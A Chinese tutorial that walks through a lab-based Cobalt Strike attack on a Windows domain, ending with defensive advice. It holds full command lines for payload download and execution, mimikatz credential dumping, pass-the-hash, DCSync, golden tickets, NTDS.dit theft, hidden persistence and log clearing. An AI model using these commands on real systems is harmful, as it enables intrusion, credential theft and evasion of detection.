Cobalt Strike内网渗透实战:从环境搭建到域控攻击的完整指南
1. 项目概述:从“工具”到“环境”的认知跃迁
看到这个标题,很多刚入门的朋友可能会立刻去搜索“Cobalt Strike下载”,然后迫不及待地想打开它,对着教程点点点。我得先泼一盆冷水:如果你抱着这种心态,大概率会在第一步就卡住,或者更糟,在完全错误的环境里折腾半天,最后除了收获一堆报错和挫败感,什么也学不到。这篇内容,我想从一个从业超过十年的角度,和你聊聊“内网渗透之域控攻击”这个听起来很酷的话题,背后到底需要什么样的知识铺垫和思维转变。这绝不是一份简单的“点击这里,输入那里”的傻瓜式教程,而是一份关于如何系统性地理解、搭建和运用一个专业安全测试环境的深度指南。
Cobalt Strike,我们业内常简称为CS,它本质上是一个协同攻击平台,或者说是一个“指挥中心”。你可以把它想象成电影里特种部队的作战指挥部,它本身不直接开枪,但它能指挥渗透测试人员(红队)的各个“作战单元”(比如后门、漏洞利用模块)协同工作。而“内网渗透”和“域控攻击”,则是这个指挥部要指挥完成的、极具挑战性的“作战任务”。所以,学习CS,第一步不是学怎么用这个软件,而是理解它要解决的战场环境——企业内网,特别是基于Windows域的网络。这意味着你需要对网络基础(TCP/IP、DNS、ARP)、Windows活动目录(AD)基础概念(域、域控、组策略、用户/计算机对象)、以及常见的横向移动手法(如票据传递、哈希传递)有一个起码的认知。零基础不是问题,但必须从这些基础开始搭建知识框架,否则后续的所有操作都将是空中楼阁。
2. 环境准备:构建你的专属“红队实验室”
在真正触碰CS之前,一个隔离、可控、高度仿真的测试环境是绝对必要的。这不仅是出于法律和道德的底线要求,更是你能进行有效学习和复现操作的前提。你不可能,也绝不应该在真实的互联网或他人的网络中进行练习。
2.1 虚拟化平台选型:VMware与VirtualBox的抉择
搭建实验室的核心是虚拟化软件。主流选择有两个:VMware Workstation Pro 和 Oracle VirtualBox。
- VMware Workstation Pro:这是业内的“黄金标准”。它的网络配置功能极其强大和灵活,可以轻松创建仅主机(Host-Only)、NAT、桥接等多种虚拟网络,并能将这些网络组合成复杂的拓扑,完美模拟企业内网的多网段环境。对硬件虚拟化(Intel VT-x/AMD-V)的支持和兼容性也最好。缺点是它是商业软件,需要购买许可证。
- Oracle VirtualBox:开源免费,这是它最大的优势。基础功能足够用于搭建一个简单的靶场环境(比如一台攻击机,一台域控靶机)。但对于需要模拟多网段、复杂路由的进阶内网环境,其网络配置的直观性和灵活性稍逊于VMware。
我的选择与建议:如果你是认真想在这个领域深入学习,并且经济条件允许,我强烈建议投资VMware Workstation Pro。它为你节省的在复杂网络配置上折腾的时间,远超其金钱成本。如果预算确实紧张,VirtualBox可以作为入门起点,但要做好心理准备,在模拟复杂网络时可能需要查阅更多资料来解决网络连通性问题。
2.2 攻击机配置:Kali Linux的定制化安装
攻击机是你发起所有操作的“前线指挥部”。Kali Linux是公认的首选,因为它预装了海量的安全工具。
系统安装:从Kali官网下载最新的ISO镜像。在VMware中新建虚拟机,操作系统类型选择“Linux”,版本选择“Debian 10.x 64位”。分配资源建议:CPU至少2核,内存4GB起步(如果同时运行多个靶机,建议8GB以上),硬盘40GB。网络适配器初始可以先设置为“NAT”模式,保证虚拟机可以访问互联网以下载更新和工具。
关键更新与汉化(可选):
# 首先更新软件源列表 sudo apt update # 进行系统升级(这可能需要一些时间) sudo apt full-upgrade -y # 安装中文字体和输入法框架(如fcitx) sudo apt install -y fonts-noto-cjk fcitx fcitx-googlepinyin # 安装完成后,重启系统 sudo reboot重启后,在系统设置的语言和区域选项中,添加中文支持并可将系统语言改为中文。但作为技术学习,我建议长期使用英文环境,这能帮助你更好地适应工具的原生输出和错误信息,减少因翻译导致的误解。
基础工具检查与安装:确保一些内网渗透必备工具已就位。
# 安装用于网络扫描和探测的利器 sudo apt install -y nmap nbtscan onesixtyone # 安装用于SMB/AD信息枚举的工具包 sudo apt install -y impacket-scripts # 安装BloodHound数据收集器(用于后期域内关系分析) sudo apt install -y bloodhound
2.3 靶场环境搭建:模拟一个真实的Windows域
这是整个实验室的灵魂。你需要至少两台Windows虚拟机:一台作为域控制器(Domain Controller, DC),一台作为加入域的普通成员服务器或工作站。
域控制器(DC)搭建:
- 系统选择:Windows Server 2012 R2 或 2016/2019 Evaluation版本(微软官网提供180天试用版)。对于学习而言,2012 R2资源占用更少。
- 虚拟机配置:分配2CPU,4GB内存,60GB硬盘。关键步骤:添加两块虚拟网卡。第一块设为“仅主机模式”(模拟内网卡),第二块设为“NAT模式”(用于初期从互联网下载更新和安装角色)。在安装完系统后,进入系统,将“仅主机模式”网卡的IP设置为静态,例如
192.168.100.10/24,并将此网卡重命名为“Internal”。 - 安装AD域服务:通过服务器管理器,添加“Active Directory 域服务”角色。随后将其提升为域控制器,新建一个林,设置根域名,例如
lab.local。这个过程会要求设置目录服务还原模式(DSRM)密码,务必牢记。 - 创建测试用户:安装完成后,在“Active Directory 用户和计算机”管理单元中,创建几个测试用户,如
lab\admin(加入Domain Admins组)、lab\sqlservice(普通域用户)、lab\user1等,并为他们设置简单的密码(如Password123!,仅用于测试)。
域成员主机搭建:
- 系统选择:Windows 10 或 Windows Server 2016/2019。
- 虚拟机配置:分配1-2CPU,2-4GB内存,40GB硬盘。只配置一块“仅主机模式”网卡,IP设置为自动获取(DHCP)。启动后,将其计算机名改为
CLIENT01,然后通过系统属性将其加入到lab.local域。使用之前创建的lab\user1账户进行加入操作。 - 验证:加入成功后,用
lab\user1账户登录该成员主机。在命令行执行whoami /all和net user /domain等命令,确认域身份和域用户列表可正常查询,证明域环境工作正常。
网络拓扑最终调整:
- 将DC的“NAT模式”网卡禁用或移除,只保留“仅主机模式”网卡(
192.168.100.10)。 - 确保攻击机(Kali)也有一块虚拟网卡连接到同一个“仅主机网络”(VMware)或“仅主机适配器”(VirtualBox)。为Kali的这块网卡设置静态IP,例如
192.168.100.100/24。 - 此时,你的实验网络应该是一个封闭的
192.168.100.0/24网段,包含:Kali攻击机(.100)、域控DC(.10)、域成员CLIENT01(通过DHCP获取,如.20)。它们三者之间可以互相ping通,但都无法直接访问外网。一个标准的、隔离的内网靶场就此建成。
- 将DC的“NAT模式”网卡禁用或移除,只保留“仅主机模式”网卡(
3. Cobalt Strike的核心组件与团队服务器部署
现在,我们终于要请出主角Cobalt Strike。再次强调,CS是客户端/服务器(C/S)架构。你需要先部署团队服务器(Team Server),然后使用客户端(Client)进行连接和控制。
3.1 理解CS架构:客户端、服务器与Beacon
- 团队服务器(Team Server):运行在Linux服务器上的一个Java程序。它是核心大脑,负责管理所有会话(Session)、托管攻击载荷(Payload)、协调团队协作。我们将在Kali上运行它。
- 客户端(Client):一个图形化界面的Java程序,运行在渗透测试人员的电脑上(可以是Windows,也可以是Linux)。我们通过它连接到团队服务器,下发指令,查看结果。
- Beacon:这是CS植入到目标系统上的后门载荷。它定期(或实时)与团队服务器通信,接收任务,返回结果。Beacon是你在目标内网中的“眼睛”和“手”。
3.2 在Kali上部署团队服务器
假设你已经通过合法途径获得了Cobalt Strike的安装包(通常是一个cobaltstrike.tgz压缩包)。
解压与准备:
# 将安装包上传到Kali,例如到家目录 tar -zxvf cobaltstrike.tgz cd cobaltstrike # 查看关键文件 ls -l你会看到
teamserver(服务器启动脚本)、cobaltstrike.jar(客户端jar包)、update(更新脚本)等文件。首次启动与修改密码:
teamserver脚本默认需要你设置一个共享密码(用于客户端连接认证)和你的Kali本机IP。# 首先,赋予执行权限 chmod +x teamserver # 启动团队服务器,语法:./teamserver <服务器IP> <共享密码> [配置文件] ./teamserver 192.168.100.100 MySuperSecretPassword123首次运行,它会生成SSL证书并启动服务。看到
[+] Team server is up on 50050之类的提示,说明启动成功。记住,这个共享密码是所有客户端连接时必须提供的,务必设置复杂且保密。连接客户端: 在Kali上(或者其他任何能访问
192.168.100.100的机器上),启动CS客户端。# 在cobaltstrike目录下 java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar客户端界面启动后,会弹出连接窗口。
- Host: 输入团队服务器IP
192.168.100.100 - Port: 默认
50050 - User: 可以任意填写,用于在团队服务器标识你这个操作员,例如
operator1 - Password: 输入启动服务器时设置的共享密码
MySuperSecretPassword123连接成功后,你就进入了CS的主界面。恭喜,你的“指挥中心”已经就绪。
- Host: 输入团队服务器IP
3.3 初始配置与监听器(Listener)创建
连接后第一件事,不是急着生成后门,而是建立“通信频道”——监听器。监听器定义了Beacon如何回连到你的团队服务器。
- 导航:点击顶部菜单
Cobalt Strike->Listeners。 - 添加:点击下方
Add按钮。 - 配置HTTP Beacon:这是最常用、最易伪装的一种。
- Payload: 选择
Beacon HTTP - Name: 给这个监听器起个名,如
http-local - HTTP Hosts: 填写你的团队服务器IP
192.168.100.100 - HTTP Port (C2): 设置为
80(HTTP默认端口,流量看起来更正常)或8080等。 - HTTP Host (Stager): 通常和HTTP Hosts一致。
- HTTP Port (Stager): 可以设置为另一个端口,如
443,但为简化,可以先和C2端口一致。
- Payload: 选择
- 保存:点击
Save。此时,你的团队服务器就在指定的IP和端口上等待Beacon的呼叫了。
重要心得:在实际攻防演练中,直接使用IP和默认端口是极易被发现的。高级用法会涉及“域名前置”(Domain Fronting)、CDN隐藏、多级重定向以及使用
Malleable C2 Profile来完全定制Beacon的通信特征(如模仿某个云服务的API流量),以绕过网络流量检测设备(IDS/IPS)。对于初学者,我们先从基础HTTP监听器开始,但必须清楚这只是“靶场玩具”,离实战有巨大差距。
4. 初始突破:获取第一个Beacon会话
有了监听器,我们需要想办法让目标机器运行我们的Beacon载荷。在靶场中,我们模拟一种常见情况:通过社会工程学或一个简单的漏洞,在域成员主机CLIENT01上获得了代码执行权限。
4.1 生成攻击载荷(Payload)
在CS客户端中:
- 点击
Attacks->Packages->Windows Executable (S)。这里的(S)代表Stageless,即生成一个完整的、不依赖阶段下载的独立后门程序。体积较大,但稳定性好。 - 关键配置:
- Listener: 选择我们刚才创建的
http-local。 - Output: 选择
Windows EXE,生成一个.exe文件。 - x64/x86: 根据目标系统架构选择。我们的Win10靶机是64位,选
x64。
- Listener: 选择我们刚才创建的
- 点击
Generate,将生成的payload.exe保存到Kali的某个目录,例如/tmp/payload.exe。
4.2 投递与执行载荷(模拟攻击)
在真实场景中,投递方式千变万化(鱼叉邮件、漏洞利用、U盘等)。在靶场,我们模拟最直接的方式:通过SMB共享或Web服务让靶机下载并执行。
- 在Kali上启动一个简单的HTTP服务:
# 切换到payload所在目录 cd /tmp # 使用Python快速启动一个HTTP服务器在8081端口 python3 -m http.server 8081 & - 在域成员靶机(CLIENT01)上模拟执行:
- 用
lab\user1登录CLIENT01。 - 打开命令行(cmd),执行以下命令,从Kali下载并运行payload(注意:这需要关闭Windows Defender实时保护,或在测试前将其排除,仅限靶场环境!):
# 在CLIENT01的cmd中执行 cd %TEMP% certutil -urlcache -split -f http://192.168.100.100:8081/payload.exe payload.exe payload.exe - 用
- 观察CS客户端:几秒到十几秒后,你应该在CS客户端的
Views->Targets选项卡下,看到一个新的主机上线。在Beacons视图中,会出现一个新的会话(Session)。右键这个会话,选择Interact,就打开了与这个Beacon的交互式命令行。
4.3 Beacon基础命令与信息收集
成功上线后,首先要做的是信息收集,了解你所处的环境。
在Beacon命令行中,输入help可以查看所有命令。一些最常用的初始命令:
# 获取目标系统的基本信息 shell whoami /all # 获取详细的进程列表 ps # 获取网络连接信息 netstat # 检查当前用户的权限(是否是本地管理员?) getuid # 查看当前目录 pwd # 执行一个本地命令(通过`shell`前缀) shell ipconfig /all shell systeminfo通过这些命令,你可以确认你当前是LAB\user1这个普通域用户,在CLIENT01这台主机上。这就是你的“初始立足点”。
5. 权限提升:从普通用户到本地管理员
在域内横向移动,通常需要更高的权限。user1只是一个普通用户,我们需要先在这台主机上提权,获取本地管理员权限,以便进行后续的凭证窃取等操作。
5.1 本地信息收集与漏洞探查
- 系统补丁情况:通过之前
systeminfo命令的输出,查看系统安装的补丁列表。我们可以将其与公开的本地提权漏洞进行比对(手动或使用脚本)。 - 使用CS内置的本地提权检查:在Beacon会话上右键,选择
Access->Elevate。这里会列出CS内置或你上传的一些提权利用模块(如MS14-058, MS16-032等)。你可以选择一个与系统版本匹配的漏洞进行尝试。 - 利用未安装的补丁:假设我们的Win10靶机缺少某个提权漏洞补丁。我们可以从Exploit-DB等平台下载对应的利用代码(例如一个用C语言编写的exe),通过Beacon的
upload命令上传到目标,然后使用execute或shell运行它。
5.2 利用CS的powerup模块进行自动化提权
CS内置了PowerShell Empire项目的PowerUp模块,这是一个非常强大的本地权限提升检查工具。
# 在Beacon中加载PowerUp脚本 powershell-import /path/to/PowerUp.ps1 # 执行所有检查 powershell Invoke-AllChecks这个脚本会检查一系列常见的错误配置,例如:
- 可写的服务二进制文件路径
- 未被引用的服务路径
- AlwaysInstallElevated 注册表项
- 缓存的安装文件(.msi)
- 弱权限的注册表项/目录
如果发现任何可利用项,脚本会给出详细的利用方法。例如,它可能发现一个服务VulnerableService的二进制路径C:\Program Files\MyService\service.exe对Everyone组有写权限。那么,我们可以:
- 生成一个恶意的
service.exe(反向shell或添加用户的exe)。 - 通过Beacon上传并覆盖原文件。
- 重启服务(或等待系统重启)。
5.3 成功提权后的操作
一旦提权成功,使用getuid命令会显示你已经是NT AUTHORITY\SYSTEM或该机器的管理员账户。此时,你可以进行更深入的操作:
转储内存中的凭证:使用
mimikatz(CS已集成,但需手动加载)。# 加载mimikatz load mimikatz # 转储lsass进程内存中的密码哈希和明文(如果系统配置允许) mimikatz !sekurlsa::logonpasswords这个命令可能会获取到本地管理员账户的哈希(NTLM Hash),甚至可能获取到曾经登录过此机器的域管理员账户的哈希!这是内网渗透中至关重要的“宝藏”。
启用远程桌面:方便后续图形化操作。
shell reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f shell netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
6. 横向移动:在内网中穿梭
现在,你已经在CLIENT01上获得了管理员权限,并可能拿到了一些密码哈希。下一步,就是以此为跳板,向域内其他机器,尤其是域控制器(DC)发起攻击。
6.1 凭证窃取与传递攻击
这是内网横向移动最核心、最高效的手段之一。
Pass the Hash (PtH) - 哈希传递: 如果你通过Mimikatz抓取到了某个用户(例如本地管理员
CLIENT01\Administrator,或者更重要的,一个域用户)的NTLM哈希,你就可以在不知道其明文密码的情况下,使用这个哈希来验证其他服务(如SMB、WMI等)。- 在CS中,你可以使用
pth命令来注入哈希到当前会话,或者使用make_token命令结合rev2self来切换上下文。 - 更直接的方式是使用
psexec或psexec_psh(PowerShell版本的psexec)模块,在指定目标时直接使用哈希进行认证。
如果目标机器# 假设我们抓到了域用户 lab\sqlservice 的哈希:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 # 使用psexec横向移动到另一台假设存在的服务器 192.168.100.30 psexec 192.168.100.30 lab\sqlservice aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4192.168.100.30的445端口开放,且lab\sqlservice用户在该机器上有管理员权限(或者SMB共享有写权限),这个命令就会将我们的Beacon payload复制过去并执行,从而在目标机器上获得一个新的Beacon会话。
- 在CS中,你可以使用
Pass the Ticket (PtT) - 票据传递: 在Kerberos认证的域环境中,用户的访问权限被封装在“票据”(Ticket)中。如果我们能窃取到某个高权限用户(如域管理员)的Kerberos票据(TGT或ST),就可以直接使用该票据访问域内任何该用户有权访问的资源,无需密码或哈希。
- 使用Mimikatz命令
sekurlsa::tickets /export可以导出当前内存中的所有Kerberos票据。 - 在CS中,可以使用
kerberos_ticket_use命令来加载一个窃取到的.kirbi票据文件。 - 之后,你的Beacon会话就拥有了该票据代表的身份权限,可以尝试访问域控或其他资源。
- 使用Mimikatz命令
6.2 利用SMB/WMI/DCOM进行远程执行
除了经典的psexec,CS还支持多种远程执行协议,用于在拥有凭证的情况下横向移动。
- WMI执行:Windows Management Instrumentation,非常隐蔽,通常不会在目标机器上留下文件。
# 使用WMI在远程主机上执行命令 jump winrm64 192.168.100.30 lab\sqlservice Password123! # 或者使用wmi模块 wmi 192.168.100.30 lab\sqlservice Password123! "cmd /c whoami" - WinRM执行:如果目标开启了WinRM服务(5985/5986端口),可以使用
winrm或psremoting进行横向移动。 - DCOM执行:通过分布式COM对象,例如MMC20.Application,在远程主机上执行命令。
6.3 端口扫描与服务发现
在横向移动前,你需要知道内网里有哪些机器,它们开放了哪些端口。CS内置了端口扫描功能。
使用Beacon的
portscan命令:# 对192.168.100.0/24网段进行TCP端口扫描,扫描常见的135,139,445,3389等端口 portscan 192.168.100.0/24 135,139,445,3389,5985,5986 arp 500这里的
arp是指使用ARP协议发现存活主机,速度很快。500是并发线程数。扫描结果会在View->Targets中显示,你可以看到哪些IP存活,以及开放的端口。使用
net view和net group命令进行域内发现:# 查看域内所有计算机(需要域用户权限) shell net view /domain shell net view /domain:lab # 查看域管理员组有哪些成员 shell net group "Domain Admins" /domain这些命令能帮你快速定位域控(通常名字包含DC、AD等)和关键用户。
7. 域控攻击:夺取皇冠上的明珠
经过前期的信息收集、权限提升和横向移动,假设我们已经成功获取了域内某台服务器(例如一台文件服务器或应用服务器)的高权限会话,并且通过凭证窃取,拿到了一个域管理员组成员的账户哈希或票据。现在,终极目标——域控制器(DC)——就在眼前。
7.1 定位域控制器
通常这很简单:
# 方法一:通过解析域名的DNS记录 shell nslookup lab.local # 方法二:查询域内角色 shell netdom query pdc # 方法三:查看时间服务器(域控通常是时间源) shell w32tm /query /configuration这些命令通常会返回域控的IP地址或主机名,例如DC01.lab.local (192.168.100.10)。
7.2 攻击路径一:DCSync攻击
这是最经典、最有效的域控攻击手法之一。它利用了域控制器复制(Directory Replication)协议的特性。如果一个账户被授予了复制目录更改的权限(默认包括域管理员组、企业管理员组等),就可以伪装成域控制器,向真正的域控制器请求同步用户密码哈希数据。
前提条件:你当前拥有的域用户权限,必须拥有以下任一权限:
- 是域管理员(Domain Admins)组成员。
- 是企业管理员(Enterprise Admins)组成员。
- 被授予了
Replicating Directory Changes和Replicating Directory Changes All权限。
利用步骤:
- 使用Mimikatz执行DCSync:
# 确保已加载mimikatz load mimikatz # 执行DCSync,转储指定用户(如krbtgt)的哈希 mimikatz !lsadump::dcsync /domain:lab.local /user:krbtgt # 或者转储整个域的所有用户哈希(数据量巨大) # mimikatz !lsadump::dcsync /domain:lab.local /all - 解读结果:命令会输出
krbtgt用户的NTLM哈希。krbtgt是Kerberos认证体系的核心服务账户,它的哈希用于加密和签名所有Kerberos票据。获取到它的哈希,意味着你可以创建“黄金票据”(Golden Ticket)。
7.3 攻击路径二:黄金票据(Golden Ticket)攻击
黄金票据是Kerberos认证中的一个概念。通过伪造由krbtgt账户加密的TGT(票据授予票据),你可以生成一个访问域内任何服务、拥有任何权限的“万能门票”。
操作步骤:
- 获取必要信息:
krbtgt用户的NTLM哈希(通过DCSync获得)。- 域的SID(安全标识符),可以通过
whoami /user命令在域内任何一台机器上获取,去掉末尾的-和用户RID即可。例如S-1-5-21-123456789-1234567890-123456789。 - 要伪造的用户名(可以任意,如
fakeadmin)。 - 域名(
lab.local)。
- 在CS中生成黄金票据:
其中# 使用mimikatz生成黄金票据并注入内存 mimikatz !kerberos::golden /domain:lab.local /sid:S-1-5-21-123456789-1234567890-123456789 /rc4:[krbtgt的NTLM哈希] /user:fakeadmin /ptt/ptt参数表示“传递票据”,即直接将生成的票据注入当前会话的内存中。 - 验证与利用:票据注入后,你的Beacon会话就拥有了
fakeadmin这个伪造用户的域管理员权限。你可以尝试访问域控的C$共享:
如果成功列出目录,说明黄金票据生效。此时,你已经完全控制了整个域。shell dir \\dc01.lab.local\c$
7.4 攻击路径三:直接攻击域控服务
如果你已经通过横向移动,在域控本身上获取了一个系统权限的会话(例如通过PsExec利用域管哈希登录了域控),那么攻击就变得直接了当。
- 转储域控上的NTDS.dit文件:NTDS.dit是活动目录的数据库文件,存储了所有域用户的哈希。可以在域控上使用卷影复制服务(Volume Shadow Copy Service, VSS)来复制它,而无需停止AD服务。
# 使用vssadmin创建卷影副本 shell vssadmin create shadow /for=C: # 复制NTDS.dit文件(通常位于C:\Windows\NTDS\) shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit # 同时复制SYSTEM注册表配置单元,用于解密NTDS.dit shell reg save HKLM\SYSTEM C:\temp\system.hiv - 下载并离线破解:将
ntds.dit和system.hiv文件下载到攻击机,使用secretsdump.py(Impacket套件)或secretsdump(Mimikatz)进行离线提取哈希。
这会输出域内所有用户的哈希,包括域管理员。# 在Kali上使用Impacket python3 secretsdump.py -ntds ntds.dit -system system.hiv LOCAL
8. 后渗透与权限维持
拿下域控不是终点,如何稳固地控制整个域,并在被发现后能重新获取访问权限,是红队行动的关键。
8.1 创建隐蔽的后门账户
直接在域控上添加一个显眼的域管理员账户是拙劣的。更隐蔽的方法是:
- SID历史攻击:为一个已存在的、不活跃的普通域用户,添加一个域管理员组的SID历史记录。这样该用户就拥有了域管理员权限,但在常规管理工具中查看其所属组时,仍然显示为普通用户。
# 使用mimikatz mimikatz !sid::add /sam:normaluser /new:Domain Admins的SID - DCShadow攻击:这是一种高级技术,通过注册一个“傀儡”域控制器,直接向活动目录数据库写入更改,可以创建隐藏的用户、修改权限等,极难被传统审计发现。
8.2 部署持久化Beacon
确保即使当前会话中断,也能重新连接。
- 计划任务:在域控或关键服务器上创建计划任务,定期执行Beacon payload。
# 使用schtasks命令 shell schtasks /create /tn "WindowsUpdateCheck" /tr "C:\Windows\Temp\beacon.exe" /sc hourly /mo 1 /ru SYSTEM - 服务持久化:安装一个新的系统服务,或将现有服务的二进制路径替换为Beacon。
- WMI事件订阅:创建一个WMI事件过滤器(如用户登录、特定时间),触发时执行Beacon payload。这是一种无文件、非常隐蔽的持久化方式。
8.3 日志清理与痕迹擦除
在测试的最后,或需要隐蔽行踪时,需要清理日志。
- 使用Mimikatz清理事件日志:
mimikatz !event::clear /system /security /application - 注意:在真实的红队评估中,是否清理日志需要根据行动规则(Rules of Engagement)来决定。有时保留日志是为了让蓝队能够追踪和响应,从而评估其检测能力。
9. 防御视角与安全建议
作为一名专业的安全从业者,了解攻击是为了更好的防御。从整个攻击链条中,我们可以提炼出关键的防御点:
- 边界防御:防止初始突破。强化邮件网关、Web应用防火墙(WAF),及时修补对外服务的漏洞,减少攻击面。
- 终端安全:在所有终端部署EDR(端点检测与响应)解决方案。它能有效检测Mimikatz等凭证窃取工具的内存调用、PsExec/WMI的异常远程执行行为。
- 权限最小化:严格执行最小权限原则。普通域用户绝不应拥有本地管理员权限。服务器上避免使用域管理员账户进行日常操作和管理。
- 网络分段与监控:将网络划分为不同的信任区域,限制横向移动的范围。部署网络流量分析(NTA)设备,监控异常的SMB、WMI、Kerberos(如异常的票据请求、DCSync复制请求)流量。
- 保护特权账户:
- 对域管理员、企业管理员账户启用“受保护用户”组(Protected Users)。
- 实施凭证保护(Credential Guard)。
- 严格限制拥有复制目录更改权限的账户数量,并监控其使用。
- 定期更改
krbtgt账户密码(至少每180天,且需更改两次)。
- 启用高级审计:启用Windows高级安全审计策略,记录详细的登录事件、账户管理事件、目录服务访问事件等。集中收集和分析这些日志(使用SIEM),建立针对横向移动、权限提升、DCSync等攻击行为的检测规则。
整个从零基础到域控攻击的旅程,实际上是一个对Windows域环境安全体系由外到内、由浅入深的系统性理解过程。Cobalt Strike是这个过程中的一把利器,但比工具更重要的是背后的知识体系、方法论和防御思维。在合法的靶场中反复练习这些步骤,理解每一步的原理和可被检测的点,你才能真正从“脚本小子”成长为一名有深度的网络安全从业者。记住,技术本身没有善恶,关键在于掌握它的人将其用于何处。始终在法律和道德的框架内进行学习和测试,用你的技能去保护,而非破坏。